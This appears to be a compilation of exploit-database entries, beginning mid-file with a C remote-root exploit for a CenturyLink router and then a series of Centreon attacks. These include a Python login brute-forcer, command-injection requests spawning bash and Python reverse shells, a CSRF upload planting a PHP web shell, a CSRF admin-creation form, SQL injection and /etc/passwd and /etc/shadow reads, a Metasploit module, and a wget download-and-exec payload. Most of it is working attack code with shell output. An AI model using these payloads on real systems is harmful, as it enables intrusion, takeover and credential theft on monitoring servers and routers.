char buf[1024] = {0};
int filled = 0;
while (filled = recv(sock, buf, 1024 - 1, 0)) {
buf[filled] = '\0';
printf("%s", buf);
fflush(stdout);
}
}
int main(int argc, char **argv) {
if (argc != 2) {
printf("PK5001Z CenturyLink Router remote root 0day\nEnjoy!\n");
printf(" --oxagast\n");
exit(1);
}
int sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock == -1)
perro("socket");
struct in_addr server_addr;
if (!inet_aton(argv[1], &server_addr))
perro("inet_aton");
struct sockaddr_in connection;
connection.sin_family = AF_INET;
memcpy(&connection.sin_addr, &server_addr, sizeof(server_addr));
connection.sin_port = htons(23);
if (connect(sock, (const struct sockaddr *)&connection, sizeof(connection)) !=
0)
perro("connect");
sleep(1);
int pid_root, pid_sys, pid_shell;
sleep(1);
send_root(sock, pid_root);
if (pid_shell = fork())
sys_info(sock, pid_sys);
if (pid_shell = fork())
send_cmd(sock, pid_shell);
else
receive(sock);
return (0);
}
# Exploit Title : Centron 19.04 - Remote Code Execution (RCE)
# Tested on Centreon API 19.04.0
# Centreon 19.04 - Login Password Bruteforcer
# Written on 6 Nov 2019
# Referencing API Authentication of the Centreon API document
# Author: st4rry
# centbruteon.py
# Centreon Download Link: https://download.centreon.com/#version-Older
# Dependencies: sys, requests, argparse, termcolor, os
#!/usr/bin/env python3
import sys
import requests
import argparse
from termcolor import colored
import os
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest='host', help='Define your target URL', required=True)
parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80)
parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP')
parser.add_argument('-l', dest='username', help='Specific username')
parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist')
parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True)
parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification')
parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle')
if len(sys.argv) == 1:
parser.print_help(sys.stderr)
sys.exit(1)
args = parser.parse_args()
protocol = 'https' if args.https else 'http'
server = f"{protocol}://{args.host}:{args.port}"
user = args.username
passfile = args.passwfile.read().splitlines()
userfile = args.userfile
dirlo = '/centreon/api/index.php?action=authenticate'
verify_ssl = not args.insecure
if args.ca_bundle:
verify_ssl = args.ca_bundle
if user:
brute_force_single_user(server, user, passfile, dirlo, verify_ssl)
elif userfile:
usrwl = userfile.read().splitlines()
brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl)
else:
print(colored('Something went wrong!', 'red'))
sys.exit(1)
def brute_force_single_user(server, user, passfile, dirlo, verify_ssl):
for password in passfile:
data = {'username': user, 'password': password}
r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
try:
print('Processing...')
print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
colored(' Username: ', 'yellow') + colored(user, 'yellow') +
colored(' Password: ', 'yellow') + colored(password, 'yellow'))
if r.status_code == 200:
print(colored('Credentials found: username: ', 'green') + colored(user, 'green') +
colored(' password: ', 'green') + colored(password, 'green') +
colored(' server: ', 'green') + colored(server, 'green'))
print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
print('\n')
break
else:
print(colored('403 - Unauthenticated!', 'red'))
except IndexError:
print(colored('Something went wrong', 'red'))
def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl):
for usr in usrwl:
for password in passfile:
data = {'username': usr, 'password': password}
r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
try:
print('Processing...')
print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
colored(' Username: ', 'yellow') + colored(usr, 'yellow') +
colored(' Password: ', 'yellow') + colored(password, 'yellow'))
if r.status_code == 200:
print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') +
colored(' password: ', 'green') + colored(password, 'green') +
colored(' server: ', 'green') + colored(server, 'green'))
print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
print('\n')
else:
print(colored('403 - Unauthenticated!', 'red'))
except IndexError:
print(colored('Something went wrong', 'red'))
if __name__ == '__main__':
main()
Centreon 2.6.1 Command Injection Vulnerability
Vendor: Centreon
Product web page: https://www.centreon.com
Affected version: 2.6.1 (CES 3.2)
Summary: Centreon is the choice of some of the world's largest
companies and mission-critical organizations for real-time IT
performance monitoring and diagnostics management.
Desc: The POST parameter 'persistant' which serves for making
a new service run in the background is not properly sanitised
before being used to execute commands. This can be exploited
to inject and execute arbitrary shell commands as well as using
cross-site request forgery attacks.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5265
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5265.php
10.08.2015
--
<<<<<<
root@zslab:~# curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-b 'PHPSESSID=bk80lvka1v8sb9ltuivjngo520' \
--data-binary $'host_id=14&service_id=19&persistant=1%27%22%600%26%2fbin%2fbash+-i+%3e+%2fdev%2ftcp%2f127.0.0.1%2f6161+0%3c%261+2%3e%261%60%27&duration_scale=s&start=08%2f17%2f2018&start_time=8%3a16&end=09%2f17%2f2018&end_time=10%3a16&comment=pwned&submitA=Save&o=as' \
'http://localhost.localdomain/centreon/main.php?p=20218'
>>>>>>
root@zslab:~# nc -4 -l -n 6161 -vv -D
Connection from 127.0.0.1 port 6161 [tcp/*] accepted
bash: no job control in this shell
bash-4.1$ id
id
uid=48(apache) gid=48(apache) groups=48(apache),494(centreon-engine),496(centreon-broker),498(centreon),499(nagios)
bash-4.1$ uname -a;cat /etc/issue
uname -a;cat /etc/issue
Linux localhost.localdomain 2.6.32-504.16.2.el6.x86_64 #1 SMP Wed Apr 22 06:48:29 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Centreon Enterprise Server
Kernel \r on an \m
bash-4.1$ pwd
pwd
/usr/share/centreon/www
bash-4.1$ exit
exit
exit
root@zslab:~#
#################################################################
Centreon 2.6.1 Stored Cross-Site Scripting Vulnerability
Desc: Centreon suffers from a stored XSS vulnerability. Input
passed thru the POST parameter 'img_comment' is not sanitized
allowing the attacker to execute HTML code into user's browser
session on the affected site.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5266
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5266.php
10.08.2015
--
POST /centreon/main.php?p=50102 HTTP/1.1
Host: localhost.localdomain
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost.localdomain/centreon/main.php?p=50102&o=a
Cookie: PHPSESSID=qg580onenijim611sca8or3o32
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------951909060822176775828135993
Content-Length: 1195
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="directories"
upload
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="list_dir"
0
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="filename"; filename="phpinfo.php"
Content-Type: application/octet-stream
<?
phpinfo();
?>
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="img_comment"
"><script>alert(1);</script>
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="action[action]"
1
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="submitA"
Save
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="img_id"
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="o"
a
-----------------------------951909060822176775828135993--
#################################################################
Centreon 2.6.1 Unrestricted File Upload Vulnerability
Desc: The vulnerability is caused due to the improper verification
of uploaded files via the 'filename' POST parameter. This can be
exploited to execute arbitrary PHP code by uploading a malicious
PHP script file that will be stored in the '/img/media/' directory.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5264
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5264.php
10.08.2015
--
<html>
<!-- Specified dir is 1337 and filename is shelly.php -->
<!-- Ex: http://localhost.localdomain/centreon/img/media/1337/shelly.php?c=id -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost.localdomain/centreon/main.php?p=50102", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------951909060822176775828135993");
xhr.withCredentials = true;
var body = "-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"directories\"\r\n" +
"\r\n" +
"1337\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"list_dir\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"filename\"; filename=\"shelly.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"echo \"\x3cpre\x3e\";system($_GET[\'c\']);echo \"\x3c\/pre\x3e\";\r\n" +
"?\x3e\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"img_comment\"\r\n" +
"\r\n" +
"peened\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"action[action]\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"submitA\"\r\n" +
"\r\n" +
"Save\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"2097152\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"img_id\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"o\"\r\n" +
"\r\n" +
"a\r\n" +
"-----------------------------951909060822176775828135993--";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
#################################################################
Centreon 2.6.1 CSRF Add Admin Exploit
Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user
visits a malicious web site.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5263
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5263.php
10.08.2015
--
<html>
<body>
<form action="'http://localhost.localdomain/centreon/main.php?p=60301" method="POST">
<input type="hidden" name="contact_alias" value="Testingus" />
<input type="hidden" name="contact_name" value="Fullio" />
<input type="hidden" name="contact_email" value="test@test.tld" />
<input type="hidden" name="contact_pager" value="" />
<input type="hidden" name="contact_template_id" value="" />
<input type="hidden" name="contact_enable_notifications[contact_enable_notifications]" value="2" />
<input type="hidden" name="timeperiod_tp_id" value="" />
<input type="hidden" name="timeperiod_tp_id2" value="" />
<input type="hidden" name="contact_oreon[contact_oreon]" value="1" />
<input type="hidden" name="contact_passwd" value="123123" />
<input type="hidden" name="contact_passwd2" value="123123" />
<input type="hidden" name="contact_lang" value="en_US" />
<input type="hidden" name="contact_admin[contact_admin]" value="1" />
<input type="hidden" name="contact_autologin_key" value="" />
<input type="hidden" name="contact_auth_type" value="local" />
<input type="hidden" name="contact_acl_groups[]" value="31" />
<input type="hidden" name="contact_acl_groups[]" value="32" />
<input type="hidden" name="contact_acl_groups[]" value="34" />
<input type="hidden" name="contact_address1" value="Neverland" />
<input type="hidden" name="contact_address2" value="" />
<input type="hidden" name="contact_address3" value="101" />
<input type="hidden" name="contact_address4" value="" />
<input type="hidden" name="contact_address5" value="" />
<input type="hidden" name="contact_address6" value="" />
<input type="hidden" name="contact_activate[contact_activate]" value="1" />
<input type="hidden" name="contact_comment" value="comment-vuln-xss-t00t" />
<input type="hidden" name="action[action]" value="1" />
<input type="hidden" name="submitA" value="Save" />
<input type="hidden" name="contact_register" value="1" />
<input type="hidden" name="contact_id" value="" />
<input type="hidden" name="o" value="a" />
<input type="hidden" name="initialValues" value="a:0:{}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution
CVEs: CVE-2015-1560, CVE-2015-1561
Vendor: Merethis - www.centreon.com
Product: Centreon
Version affected: 2.5.4 and prior
Product description:
Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. (from https://www.centreon.com/en/)
Advisory introduction:
Centron 2.5.4 is susceptible to multiple vulnerabilities, including unauthenticated blind SQL injection and authenticated remote system command execution.
Credit: Huy-Ngoc DAU of Deloitte Conseil, France
================================
Finding 1: Unauthenticated Blind SQL injection in isUserAdmin function (CVE-2015-1560)
================================
Vulnerable function is "isUserAdmin" (defined in include/common/common-Func.php), in which unsanitized "sid" GET parameter is used in a SQL request.
PoC:
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si
d=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si
d=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27
By exploiting CVE-2015-1560, an attacker can obtain among others a valid session_id, which is required to exploit CVE-2015-1561.
================================
Finding 2: Authenticated Command Execution in getStats.php (CVE-2015-1561)
================================
$command_line variable, which is passed to popen function, is constructed using unsanitized GET parameters.
PoC (a valid session_id value is required):
- Reading /etc/passwd by injecting command into "ns_id" parameter:
http://example.domain/centreon/include/Administration/corePerformance/ge
tStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=t
oday&session_id=[valid session_id]
- Injecting "uname ?a" into "end" parameter:
http://example.domain/centreon/include/Administration/corePerformance/ge
tStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+%
23&session_id=[valid session_id]
Combining two vulnerabilities, an unauthenticated attacker can take control of the web server.
================================
Timeline
================================
26/01/2015 - Vulnerabilities discovered
29/01/2015 - Vendor notified
05/02/2015 - Vendor fixed SQLi
13/02/2015 - Vendor fixed RCE
References
Vendor fixes:
- SQLi : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21
3b9c60de1bad0b464fd6403c828cf12582
- Command execution : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21
3b9c60de1bad0b464fd6403c828cf12582
About Deloitte:
Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. In France, Deloitte SAS is the member firm of Deloitte Touche Tohmatsu Limited, and professional services are provided by its subsidiaries and affiliates.
Our Enterprise Risk Services practice is made up of over 11,000 professionals providing services relating to security, privacy & resilience; data governance and analytics; information and controls assurance; risk management technologies; and technology risk & governance. We help organizations build value by taking a "Risk Intelligent" approach to managing financial, technology, and business risks.
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Centreon Web Useralias Command Execution',
'Description' => %q(
Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
errors. This functionality can be abused for arbitrary code
execution, and can be triggered via the login screen prior to
authentication.
),
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # module
'Nicolas CHATELAIN <n.chatelain@sysdream.com>' # discovery
],
'References' =>
[
[ 'EDB', '39501' ]
],
'License' => MSF_LICENSE,
'Platform' => ['python'],
'Privileged' => false,
'Arch' => ARCH_PYTHON,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 26 2016'
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
], self.class
)
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET'
)
/LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body
if version && Gem::Version.new(version) <= Gem::Version.new('2.5.3')
vprint_good("Version Detected: #{version}")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def exploit
begin
vprint_status('Sending malicious login')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_post' =>
{
'useralias' => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
'password' => Rex::Text.rand_text_alpha(5)
}
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
Unauthenticated Remote Command Execution in Centreon Web Interface
==================================================================
Description
===========
Centreon is a popular monitoring solution.
A critical vulnerability has been found in the Centreon logging class
allowing remote users to execute arbitrary commands.
SQL injection leading to RCE
============================
Centreon logs SQL database errors in a log file using the "echo" system
command and the exec() PHP function. On the authentification class,
Centreon use htmlentities with the ENT_QUOTES options to filter SQL
entities.
However, Centreon doesn't filter the SQL escape character "\" and it is
possible to generate an SQL Error.
Because of the use of the "echo" system command with the PHP exec()
function, and because of the lack of sanitization, it is possible to
inject arbitrary system commands.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-78
----------------
Proof of Concept
----------------
TCP Reverse Shell using python.
#!/usr/bin/env python
import requests
import argparse
def shell(target, reverseip, reverseport):
payload = 'import socket as a,subprocess as b,os as
c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);'
% (reverseip,reverseport)
print "[~] Starting reverseshell : %s - port : %d" % (reverseip,
reverseport)
req = requests.post(target, data={"useralias": "$(echo %s |
base64 -d | python)\\" % payload.encode("base64").replace("\n",""),
"password": "foo"})
print "[+] DEAD !"
if __name__ == "__main__":
print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@sysdream.com>"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True)
parser.add_argument("--reverseip", required=True)
parser.add_argument("--reverseport", required=True, type=int)
args = parser.parse_args()
shell(args.target, args.reverseip, args.reverseport)
Shell :
nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py
--target=http://172.16.138.137/centreon/index.php
--reverseip=172.16.138.1 --reverseport 8888
[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@sysdream.com>
[~] Starting reverseshell : 172.16.138.1 - port : 8888
# Other term
nightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888
Ncat: Version 6.45 ( http://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.16.138.135.
Ncat: Connection from 172.16.138.135:50050.
whoami
apache
groups
apache centreon-engine centreon-broker centreon nagios
---------------
Vulnerable code
---------------
The vulnerable code is located in class/centreonLog.class.php, line 82
and line 154:
/*
* print Error in log file.
*/
exec("echo \"".$string."\" >> ".$this->errorType[$id]);
In class/centreonAuth.class.php, line 227:
$DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE
`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "'
AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1");
--------
Solution
--------
Update to the Centreon 2.5.4
Possible root password disclosure in centengine (Centreon Entreprise Server)
============================================================================
In some configurations, when centengine can run as root (with sudo).
It's possible to read some file content.
**Access Vector**: local
**Security Risk**: high
**Vulnerability**: CWE-209
----------------
Proof of Concept
----------------
$ sudo /usr/sbin/centengine -v /etc/shadow
[1416391088] reading main config file
[1416391088] error while processing a config file: [/etc/shadow:1]
bad variable name:
'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'
[1416391088]
---------------
Vulnerable code
---------------
In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon
CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *
--------
Solution
--------
Do not allow centengine to be run as root or do not disclose the line
that caused the error.
Timeline (dd/mm/yyyy)
=====================
* 18/11/2014 : Initial discovery
* 26/11/2014 : Contact with Centreon team
* 27/11/2014 : Centreon correct vulnerabilities
* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities
Fixes
=====
*
https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9
*
https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d
*
https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1
Affected versions
=================
* Centreon <= 2.5.3
Credits
=======
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
source: https://www.securityfocus.com/bid/50568/info
Centreon is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
Centreon 2.3.1 is affected; other versions may also be vulnerable.
http://www.example.com/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1
# Exploit Title: Centreon 19.10.5 - Remote Command Execution
# Date: 2020-01-27
# Exploit Author: Fabien AUNAY, Omri BASO
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -
###########################################################################################################
Centreon 19.10.5 Remote Command Execution Resources
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
It is possible to call binaries not only in default $USER$ path by adding Poller's Resources.
By adding two entries it is possible to trigger a download exec reverse shell.
Note, your reverse shell is persistent because Centreon execute your payloads all 10 minutes by default.
Steps:
Objective 1 : Add Download Resource
Objective 2 : Add Exec Resource
Objective 3 : Create your both commands check
Objective 4 : Create your services and link them with a host
Restart the Central.
###########################################################################################################
# Objective 1 : Add Download Resource
- Configuration/Pollers/Resources
- Problem:
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
Illegal Macro Output Characters : `~$^&"|'<>
Maximum client side input size limit: 35
- Information:
Read Centreon documentation:
To install Centreon software from the repository, you should first install the centreon-release package,
which will provide the repository file. Some may not have the wget package installed.
If not perform the following : yum install wget
Solution 1: Remove restriction in Configuration/Pollers/Engine configuration
Solution 2: Modify input size inspector in client side <input> size="250"
Solution 3: Mixed, use a custom payload -> wget -P /tmp/ 127.0.0.1:8080/x.sh
# Objective 2 : Add Exec Resource
- Configuration/Pollers/Resources
- Problem:
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
Illegal Macro Output Characters : `~$^&"|'<>
Maximum client side input size limit: 35
Solution: Use a custom payload -> bash /tmp/x.sh
# Objective 3 : Create your both commands check with your resources $xxx$ without arguments
# Objective 4 : Create your services and link them with a host
POC:
Payload x.sh : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121
python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 -
nc -lvnp 1234
Ncat: Version 7.50
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:43128.
id
uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
sudo -l
Matching Defaults entries for centreon-engine on centreon-lab:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty
User centreon-engine may run the following commands on centreon-lab:
(root) NOPASSWD: /sbin/service centreontrapd start
(root) NOPASSWD: /sbin/service centreontrapd stop
(root) NOPASSWD: /sbin/service centreontrapd restart
(root) NOPASSWD: /sbin/service centreontrapd reload
(root) NOPASSWD: /usr/sbin/service centreontrapd start
(root) NOPASSWD: /usr/sbin/service centreontrapd stop
(root) NOPASSWD: /usr/sbin/service centreontrapd restart
(root) NOPASSWD: /usr/sbin/service centreontrapd reload
(root) NOPASSWD: /sbin/service centengine start
(root) NOPASSWD: /sbin/service centengine stop
(root) NOPASSWD: /sbin/service centengine restart
(root) NOPASSWD: /sbin/service centengine reload
(root) NOPASSWD: /usr/sbin/service centengine start
(root) NOPASSWD: /usr/sbin/service centengine stop
(root) NOPASSWD: /usr/sbin/service centengine restart
(root) NOPASSWD: /usr/sbin/service centengine reload
(root) NOPASSWD: /bin/systemctl start centengine
(root) NOPASSWD: /bin/systemctl stop centengine
(root) NOPASSWD: /bin/systemctl restart centengine
(root) NOPASSWD: /bin/systemctl reload centengine
(root) NOPASSWD: /usr/bin/systemctl start centengine
(root) NOPASSWD: /usr/bin/systemctl stop centengine
(root) NOPASSWD: /usr/bin/systemctl restart centengine
(root) NOPASSWD: /usr/bin/systemctl reload centengine
(root) NOPASSWD: /sbin/service cbd start
(root) NOPASSWD: /sbin/service cbd stop
(root) NOPASSWD: /sbin/service cbd restart
(root) NOPASSWD: /sbin/service cbd reload
(root) NOPASSWD: /usr/sbin/service cbd start
(root) NOPASSWD: /usr/sbin/service cbd stop
(root) NOPASSWD: /usr/sbin/service cbd restart
(root) NOPASSWD: /usr/sbin/service cbd reload
(root) NOPASSWD: /bin/systemctl start cbd
(root) NOPASSWD: /bin/systemctl stop cbd
(root) NOPASSWD: /bin/systemctl restart cbd
(root) NOPASSWD: /bin/systemctl reload cbd
(root) NOPASSWD: /usr/bin/systemctl start cbd
(root) NOPASSWD: /usr/bin/systemctl stop cbd
(root) NOPASSWD: /usr/bin/systemctl restart cbd
(root) NOPASSWD: /usr/bin/systemctl reload cbd